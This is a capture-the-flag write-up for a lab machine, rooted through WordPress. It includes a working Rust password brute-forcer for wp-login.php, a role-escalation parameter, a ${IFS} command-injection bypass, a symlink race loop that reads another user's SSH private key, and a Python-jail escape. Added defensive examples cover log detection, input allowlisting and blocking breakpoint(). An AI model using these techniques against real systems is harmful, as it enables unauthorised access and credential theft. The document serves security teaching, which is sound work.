So as we can see we have ports 22 and 80, and we have a manual directory. Let's dig more and see what we have.
Initial Access
After some search I found a directory called wordpress, which seems to contain the main website.
So after a long session of searching I found something interesting using wpscan.
Two users. So we all know that when you try to enter a password for a valid username in WordPress you will get a message saying that the password is incorrect, which confirms the username is valid.
With that I decided to create a simple script in Rust to brute-force the password.
// Cargo.toml: reqwest = { version = "0.11", features = ["blocking", "cookies"] }, threadpool = "1"
use reqwest::{blocking::Client, cookie::Jar};
use std::{collections::HashMap, fs::File, io::{BufRead, BufReader}, sync::Arc};
use threadpool::ThreadPool;

fn test(client: Client, password: &str, target: &str) {
    // log=asd&pwd=asd&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.187.97%2Fwordpress%2Fwp-admin%2F&testcookie=
    let mut params = HashMap::new();
    params.insert("log", "admin");
    params.insert("pwd", password);
    params.insert("wp-submit", "Log in");
    params.insert("redirect_to", "http://10.10.187.97/wordpress/wp-admin/");
    // params.insert("testcookie", "1");
    let res = client
        .post(target)
        .form(&params) // sent as application/x-www-form-urlencoded by default
        .send()
        .expect("Error while sending the request");
    let status = res.status();
    let body = res.text().expect("Error while reading the response");
    // println!("{:#}", body);
    // WordPress re-renders the login form with an "incorrect." error on a wrong password
    if status.is_success() && !body.contains("incorrect.") {
        println!("Password Found : {password}");
    }
}

fn main() {
    let jar = Arc::new(Jar::default());
    let thread = ThreadPool::new(30);
    let file = File::open("/home/pythonic/Downloads/rockyou.txt").expect("Error while opening the file");
    let target = "http://10.10.187.97/wordpress/wp-login.php";
    let client = Client::builder()
        .cookie_store(true) // Enable cookie storage
        .cookie_provider(jar) // Set the jar for cookies
        .build()
        .expect("Error while building client");
    let reader = BufReader::new(file);
    for f in reader.lines() {
        let client_clone = client.clone();
        // let target_clone = target.clone();
        thread.execute(move || {
            if let Ok(password) = f {
                test(client_clone, &password, target);
            }
        });
    }
    thread.join();
    println!("Hello, world!");
}
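From the defender's side, a run of the script above leaves a very recognisable trace: many POSTs to wp-login.php from one address in a short window, each answered with a 200 (form re-rendered with the error), and, if a guess lands, a 302 to wp-admin. The following Python is an added example, not part of the writeup, that parses constructed Apache combined-format log lines and flags such bursts; the IPs, timestamps and user agents in SAMPLE_LOG are made up for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not real traffic): one address hammering the login form,
# one ordinary user logging in once.
SAMPLE_LOG = """\
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 4512 "-" "reqwest/0.11"
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 4512 "-" "reqwest/0.11"
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 4512 "-" "reqwest/0.11"
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 4512 "-" "reqwest/0.11"
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 4512 "-" "reqwest/0.11"
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 "-" "reqwest/0.11"
192.168.1.20 - - [01/Jan/2024:10:05:00 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.1.20 - - [01/Jan/2024:10:05:01 +0000] "GET /wordpress/wp-admin/ HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect_login_bursts(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: (total_attempts, first_302_timestamp_or_None)} for every IP
    that POSTs to wp-login.php at least `threshold` times inside `window`.
    A 302 among the attempts means a guess was accepted (WordPress redirects on success)."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].endswith("/wp-login.php"):
            per_ip[rec["ip"]].append(rec)

    alerts = {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        for end in range(len(recs)):
            # Slide the window start forward until the span fits inside `window`.
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            if end - start + 1 >= threshold:
                first_success = next((r["ts"] for r in recs if r["status"] == 302), None)
                alerts[ip] = (len(recs), first_success)
                break
    return alerts


if __name__ == "__main__":
    for ip, (count, success) in detect_login_bursts(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {count} login POSTs, first redirect at {success}")
```

The threshold and window are tuning knobs; the shape of the alert (burst of 200s followed by a 302 from the same source) is what distinguishes a successful guess from a user who simply mistyped a few times. Rate-limiting wp-login.php and returning the same error text for unknown and known usernames remove the oracle the script relies on.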
Which states that the problem is that the WP Data Access plugin does not check whether the user is authorized to change his role, meaning any user with simple privileges can change his privileges to administrator.
So as you can see above in the Burp image I added wpda_role[]=administrator, which makes us admins as you can see in the second image.
For now let's get an initial foothold on the machine.
As for the initial foothold, it was easy: just navigate to Tools → Theme File Editor. Then
choose 404.php and paste your reverse shell, and make sure to change the theme you edit. I am not sure why, but I was having issues with the original one. Anyway, that should be it.
And yeah.
John
After that I started enumerating the machine. I found a user called john whose directory we have access to. Then I saw this.
So john has a PHP server running on port 9999, so we need to find a way to tunnel to see what that server is running. We can use a tool called chisel.
This command will connect to port 8001 on our machine and forward port 9999 from the target machine to port 9999 on our machine.
And we will see this page.
So after some testing I see that it deletes the spaces by default.
So as you can see it trims all the spaces, so we may be able to do something if we find some trick to bypass this.
So there is a shell variable called IFS (the internal field separator). On Unix-based systems its default value contains the space character, so if we are able to inject it we may be able to execute the command.
So as you can see we added ${IFS} to the command, which the shell substitutes with a separator, and we are able to execute the command.
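The root cause here is not the missing space check but the design: user input is concatenated into a shell command line, so any separator the shell understands (tab, newline, ${IFS}) does the job a literal space was meant to do. The following Python is an added example, not code from the writeup or from the target's PHP server, that places the weak filter beside the hardened form: an allowlist on the expected value (a hostname or IPv4 literal) plus an argv list handed to subprocess with no shell in between. The function and variable names are chosen for the demonstration.

```python
import re
import subprocess

# Every byte a POSIX shell treats specially; space removal covers exactly one of them.
SHELL_META = set(" \t\n\r$`;&|<>(){}[]\\'\"*?~")


def strip_spaces_filter(user_input):
    """The weak check described in the writeup: drop spaces, keep everything else."""
    return user_input.replace(" ", "")


def contains_shell_metachar(value):
    """Blocklist view: is any shell-significant character present?"""
    return any(c in SHELL_META for c in value)


# Allowlist view: only characters a hostname or dotted IPv4 literal can contain.
HOST_RE = re.compile(r"^[A-Za-z0-9.\-]{1,253}$")


def validate_host(user_input):
    """Reject anything that is not a plausible host; the error is deliberately terse."""
    if not HOST_RE.match(user_input):
        raise ValueError("invalid host")
    return user_input


def is_accepted(user_input):
    try:
        validate_host(user_input)
        return True
    except ValueError:
        return False


def build_ping_argv(user_input):
    """Hardened form: the validated value becomes one argv element, never part of a shell string."""
    return ["ping", "-c", "1", validate_host(user_input)]


def run_ping(user_input):
    # shell=False (the default for a list): the kernel receives argv directly, nothing re-parses it.
    return subprocess.run(build_ping_argv(user_input), capture_output=True, text=True)


if __name__ == "__main__":
    sample = "127.0.0.1${IFS}extra"  # constructed input carrying a non-space separator
    print("after space stripping:", strip_spaces_filter(sample))
    print("allowlist accepts it:", is_accepted(sample))
```

The blocklist function is included only to show how long the list of dangerous characters is; the allowlist plus argv form is the fix, because it does not depend on enumerating separators at all.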
With that we can now easily get a shell.
A simple reverse shell will do. Now we just need to set up the Python server.
So the final code will be something like this. Do not forget to set up a listener.
And here we are as john.
And this is our first flag. A long run.
Youcef
After that I decided to make an SSH key using ssh-keygen.
ssh-keygen -f john
This command will generate public and private keys for john.
Just move the .pub key into .ssh/authorized_keys, then copy the private key to your machine and change its permissions to 600, and you should be able to log in via SSH, which is much better.
Now we need to get the user youcef. When we access there we will see a readfile binary which we do not have the source code for.
So we need to reverse engineer it.
So to begin with we can see that there are a lot of checks.
As we can see the code contains a race condition. Why??
First, because the checks are separate it may be possible to pass some checks and then read a file that does not meet the conditions. So we may be able to create a symbolic link that refers to the id_rsa of the youcef user, but the permissions of the symbolic link are those of the original file, meaning we will not be able to read it. Do not forget that readfile has the SUID bit, meaning it is executed as youcef, so if we are somehow able to create a symbolic file and switch it between symbolic and normal file we can exploit the race condition.
while true; do ln -sf /home/youcef/.ssh/id_rsa key; rm key; touch key; done &
This loop will create a symbolic link to id_rsa, remove it and create it again, forever.
for i in {1..50}; do /home/youcef/./readfile key; done
Here is where we exploit the race condition: we use the readfile binary to read the file content with youcef's permissions, and by doing that we will eventually see the key.
And after that we just crack it with john.
ssh2john key_j > hash
key_j is your file that contains the key.
Root
As for the final run, to become root.
We can see that the current user has root access to jail.py, so let's see what it has.
So it's a program that allows us to execute interactive Python code, but it's so restricted that we cannot simply run anything.
So this could be simple: we have a built-in function in Python called breakpoint().
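breakpoint() is dangerous inside a restricted interpreter because it does not run user code at all: it calls sys.breakpointhook, which by default drops into pdb, and pdb is a full unrestricted REPL running with the process's privileges. The following Python is an added example, not jail.py from the machine and not code from the writeup; it shows a reduced-builtins exec of the kind the writeup describes, with the hook replaced so that a stray breakpoint() raises instead of handing over a debugger. Function names and the sample sources are chosen for the demonstration.

```python
import sys


def _blocked_breakpoint(*args, **kwargs):
    # Whatever the sandbox forgot to remove from builtins, the debugger itself is never reachable.
    raise RuntimeError("breakpoint() is disabled in this sandbox")


def harden_breakpoint():
    """builtins.breakpoint() always dispatches through sys.breakpointhook; replace it process-wide."""
    sys.breakpointhook = _blocked_breakpoint


def run_restricted(source):
    """Execute untrusted source with a small builtins table.
    Returns 'ok', 'blocked' (breakpoint attempted), 'denied' (removed builtin or import used)
    or 'error' for any other exception."""
    harden_breakpoint()
    # breakpoint is left in on purpose to show the hook catching what the allowlist missed.
    safe_builtins = {"print": print, "len": len, "range": range, "breakpoint": breakpoint}
    try:
        exec(source, {"__builtins__": safe_builtins})
        return "ok"
    except RuntimeError as e:
        return "blocked" if "breakpoint" in str(e) else "error"
    except (NameError, ImportError):
        # No __import__ in the table means `import` fails; missing names like open() raise NameError.
        return "denied"
    except Exception:
        return "error"


if __name__ == "__main__":
    for src in ("print(len(range(3)))", "breakpoint()", "import os", "open('/etc/hostname')"):
        print(f"{src!r:32} -> {run_restricted(src)}")
```

Setting the environment variable PYTHONBREAKPOINT=0 before launching the interpreter has the same effect on the default hook and needs no code change. Either way, this is defence in depth only: a trimmed builtins dictionary is not a security boundary in CPython, so code from an untrusted user belongs in a separate process with its own user, filesystem view and resource limits, not in the same interpreter as root.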